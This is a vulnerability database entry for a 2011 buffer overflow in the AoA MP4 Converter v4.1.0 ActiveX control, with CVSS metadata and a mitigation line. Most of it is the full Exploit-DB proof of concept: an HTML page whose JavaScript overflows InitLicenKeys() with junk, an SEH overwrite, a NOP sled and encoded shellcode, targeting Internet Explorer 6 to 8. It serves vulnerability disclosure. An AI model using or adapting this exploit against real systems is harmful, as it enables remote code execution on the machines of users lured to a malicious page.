AoA Mp4 converter v4.1.0 Activex

vendor:

AoA MP4 Converter

by:

Carlos Mario Penagos Hollmann

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: AoA MP4 Converter

Affected Version From: v4.1.0

Affected Version To: v4.1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:aoamedia:aoa_mp4_converter

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

AoA Mp4 converter v4.1.0 Activex

A buffer overflow vulnerability exists in AoA Mp4 converter v4.1.0 Activex which allows a remote attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to a boundary error when handling specially crafted arguments passed to the InitLicenKeys() method of the vulnerable ActiveX control. An attacker can exploit this vulnerability by enticing a user to visit a malicious web page containing specially crafted HTML code that triggers the overflow.

Mitigation:

Upgrade to the latest version of AoA Mp4 converter v4.1.0 Activex

Source

Exploit-DB raw data:

# Exploit Title: AoA Mp4 converter v4.1.0 Activex
# Date: Febrary 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.aoamedia.com/AoAMP4Converter.exe
# Version: v4.1.0
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8
<html>
mail----> shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
 / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
   
 COLOMBIA hacking presents.............
FIX your SkinCrafter.dll

AoA Mp4 converter v4.1.0  exploit for IE 6 ,IE 7 , IE 8

just some badchars :( thanks sud0
fataku....DONT BE LAZY!!
the vendor dint replay my emails so here is the exploit
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target'></object>
<script language='javascript'>


nseh="\xEB\x06\x90\x90";
seh="\xB7\x1A\x01\x10";
nops="\x90\x90\x90\x90\x90\x90\x90";
shell= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4b\x58\x4e\x4e\x45\x45\x4b\x48\x4e\x4e\x4a\x56\x42\x52\x42\x32\x42\x32\x4f\x52\x4a\x36\x43\x56\x41\x36\x4e\x36\x43\x56\x4d\x38\x45\x44\x4a\x4f\x42\x35\x4a\x4b\x47\x4c\x43\x39\x44\x4c\x47\x37\x4f\x4f\x42\x4d\x5a";
junk1="A";
junk2="A";
while (junk1.length<2048){ junk1+=junk1;}

junk1=junk1.substring(0,2048);
junk2=junk1;
arg1=junk1+nseh+seh+nops+shell+junk2;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";

target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );


</script>